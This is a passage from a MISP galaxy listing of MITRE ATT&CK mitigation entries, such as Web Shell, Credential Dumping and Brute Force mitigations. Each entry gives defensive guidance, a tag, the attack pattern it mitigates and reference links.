Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.

The tag is: misp-galaxy:mitre-course-of-action="Drive-by Compromise Mitigation - T1189"

Drive-by Compromise Mitigation - T1189 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 6564. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1189

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

https://en.wikipedia.org/wiki/Control-flow_integrity

Data Obfuscation Mitigation - T1001

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Obfuscation Mitigation - T1001"

Data Obfuscation Mitigation - T1001 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 6565. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1001

Web Shell Mitigation - T1100

Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.

Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)

The tag is: misp-galaxy:mitre-course-of-action="Web Shell Mitigation - T1100"

Web Shell Mitigation - T1100 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 6566. Table References

Links

https://attack.mitre.org/mitigations/T1100

https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration Mitigation - T1020

Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Exfiltration Mitigation - T1020"

Automated Exfiltration Mitigation - T1020 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 6567. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1020

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Hardware Additions Mitigation - T1200

Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.

Block unknown devices and accessories by endpoint security configuration and monitoring agent.

The tag is: misp-galaxy:mitre-course-of-action="Hardware Additions Mitigation - T1200"

Hardware Additions Mitigation - T1200 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 6568. Table References

Links

https://attack.mitre.org/mitigations/T1200

https://en.wikipedia.org/wiki/IEEE_802.1X

Data Compressed Mitigation - T1002

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.

The tag is: misp-galaxy:mitre-course-of-action="Data Compressed Mitigation - T1002"

Data Compressed Mitigation - T1002 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

Table 6569. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1002

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows

Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)

Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)

Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)

Consider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)

Linux

Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.

The tag is: misp-galaxy:mitre-course-of-action="Credential Dumping Mitigation - T1003"

Credential Dumping Mitigation - T1003 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 6570. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://adsecurity.org/?p=1729

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1003

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard

https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard

https://technet.microsoft.com/en-us/library/dn408187.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://technet.microsoft.com/library/jj865668.aspx

System Partition Integrity - M1004

Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.

The tag is: misp-galaxy:mitre-course-of-action="System Partition Integrity - M1004"

System Partition Integrity - M1004 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"

Table 6571. Table References

Links

https://attack.mitre.org/mitigations/M1004

Network Sniffing Mitigation - T1040

Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.

Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Sniffing Mitigation - T1040"

Network Sniffing Mitigation - T1040 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 6572. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1040

https://technet.microsoft.com/en-us/library/ee791851.aspx

New Service Mitigation - T1050

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new services.

Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="New Service Mitigation - T1050"

New Service Mitigation - T1050 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 6573. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1050

https://technet.microsoft.com/en-us/library/ee791851.aspx

Fallback Channels Mitigation - T1008

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Fallback Channels Mitigation - T1008"

Fallback Channels Mitigation - T1008 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 6574. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1008

Binary Padding Mitigation - T1009

Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Binary Padding Mitigation - T1009"

Binary Padding Mitigation - T1009 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Table 6575. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1009

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Encrypt Network Traffic - M1009

Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.

iOS’s App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.

Android’s Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).

Use of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Network Traffic - M1009"

Encrypt Network Traffic - M1009 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467" with estimative-language:likelihood-probability="almost-certain"

Table 6576. Table References

Links

https://attack.mitre.org/mitigations/M1009

https://developer.android.com/training/articles/security-config.html

https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/

Brute Force Mitigation - T1110

Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)

Refer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)

Where possible, also enable multi factor authentication on external facing services.

The tag is: misp-galaxy:mitre-course-of-action="Brute Force Mitigation - T1110"

Brute Force Mitigation - T1110 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 6577. Table References

Links

https://attack.mitre.org/mitigations/T1110

https://pages.nist.gov/800-63-3/sp800-63b.html

Query Registry Mitigation - T1012

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Query Registry Mitigation - T1012"

Query Registry Mitigation - T1012 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 6578. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1012

https://technet.microsoft.com/en-us/library/ee791851.aspx

Web Service Mitigation - T1102

Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Web Service Mitigation - T1102"

Web Service Mitigation - T1102 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 6579. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1102

Application Developer Guidance - M1013

This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.

The tag is: misp-galaxy:mitre-course-of-action="Application Developer Guidance - M1013"

Application Developer Guidance - M1013 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"

Table 6580. Table References

Links

https://attack.mitre.org/mitigations/M1013

AppInit DLLs Mitigation - T1103

Upgrade to Windows 8 or later and enable secure boot.

Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppInit DLLs Mitigation - T1103"

AppInit DLLs Mitigation - T1103 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 6581. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1103

Network Intrusion Prevention - M1031

Use intrusion detection signatures to block traffic at network boundaries.

The tag is: misp-galaxy:mitre-course-of-action="Network Intrusion Prevention - M1031"

Table 6582. Table References

Links

https://attack.mitre.org/mitigations/M1031

Port Monitors Mitigation - T1013

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.

The tag is: misp-galaxy:mitre-course-of-action="Port Monitors Mitigation - T1013"

Port Monitors Mitigation - T1013 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013" with estimative-language:likelihood-probability="almost-certain"

Table 6583. Table References

Links

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1013

Encrypt Sensitive Information - M1041

Protect sensitive information with strong encryption.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Sensitive Information - M1041"

Table 6584. Table References

Links

https://attack.mitre.org/mitigations/M1041

Active Directory Configuration - M1015

Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.

The tag is: misp-galaxy:mitre-course-of-action="Active Directory Configuration - M1015"

Table 6585. Table References

Links

https://attack.mitre.org/mitigations/M1015

Accessibility Features Mitigation - T1015

To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later. (Citation: TechNet RDP NLA)

If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)

Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Accessibility Features Mitigation - T1015"

Accessibility Features Mitigation - T1015 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"

Table 6586. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1015

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/cc731150.aspx

https://technet.microsoft.com/en-us/library/cc732713.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Plist Modification Mitigation - T1150

Prevent plist files from being modified by users by making them read-only.

The tag is: misp-galaxy:mitre-course-of-action="Plist Modification Mitigation - T1150"

Plist Modification Mitigation - T1150 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"

Table 6587. Table References

Links

https://attack.mitre.org/mitigations/T1150

Systemd Service Mitigation - T1501

The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services.

The tag is: misp-galaxy:mitre-course-of-action="Systemd Service Mitigation - T1501"

Table 6588. Table References

Links

https://attack.mitre.org/mitigations/T1501

Shared Webroot Mitigation - T1051

Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.

Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Secuirty) (Citation: NIST Server Security July 2008)

The tag is: misp-galaxy:mitre-course-of-action="Shared Webroot Mitigation - T1051"

Shared Webroot Mitigation - T1051 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"

Table 6589. Table References

Links

https://attack.mitre.org/mitigations/T1051

https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf

https://www.acunetix.com/websitesecurity/webserver-security/

Launch Daemon Mitigation - T1160

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.

The tag is: misp-galaxy:mitre-course-of-action="Launch Daemon Mitigation - T1160"

Launch Daemon Mitigation - T1160 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"

Table 6590. Table References

Links

https://attack.mitre.org/mitigations/T1160

File Deletion Mitigation - T1107

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File Deletion Mitigation - T1107"

File Deletion Mitigation - T1107 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 6591. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1107

https://technet.microsoft.com/en-us/library/ee791851.aspx

User Account Management - M1018

Manage the creation, modification, use, and permissions associated to user accounts.

The tag is: misp-galaxy:mitre-course-of-action="User Account Management - M1018"

Table 6592. Table References

Links

https://attack.mitre.org/mitigations/M1018

Redundant Access Mitigation - T1108

Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Redundant Access Mitigation - T1108"

Redundant Access Mitigation - T1108 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108" with estimative-language:likelihood-probability="almost-certain"

Table 6593. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1108

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Component Firmware Mitigation - T1109

Prevent adversary access to privileged accounts or access necessary to perform this technique.

Consider removing and replacing system components suspected of being compromised.

The tag is: misp-galaxy:mitre-course-of-action="Component Firmware Mitigation - T1109"

Table 6594. Table References

Links

https://attack.mitre.org/mitigations/T1109

System Firmware Mitigation - T1019

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)

The tag is: misp-galaxy:mitre-course-of-action="System Firmware Mitigation - T1019"

System Firmware Mitigation - T1019 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

Table 6595. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

https://attack.mitre.org/mitigations/T1019

Threat Intelligence Program - M1019

A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.

The tag is: misp-galaxy:mitre-course-of-action="Threat Intelligence Program - M1019"

Table 6596. Table References

Links

https://attack.mitre.org/mitigations/M1019

Data Encrypted Mitigation - T1022

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted Mitigation - T1022"

Data Encrypted Mitigation - T1022 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022" with estimative-language:likelihood-probability="almost-certain"

Table 6597. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1022

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Shortcut Modification Mitigation - T1023

Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)

Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Shortcut Modification Mitigation - T1023"

Shortcut Modification Mitigation - T1023 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 6598. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1023

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482

User Execution Mitigation - T1204

Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.

If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .lnk, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and RAR that may be used to conceal malicious files in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.

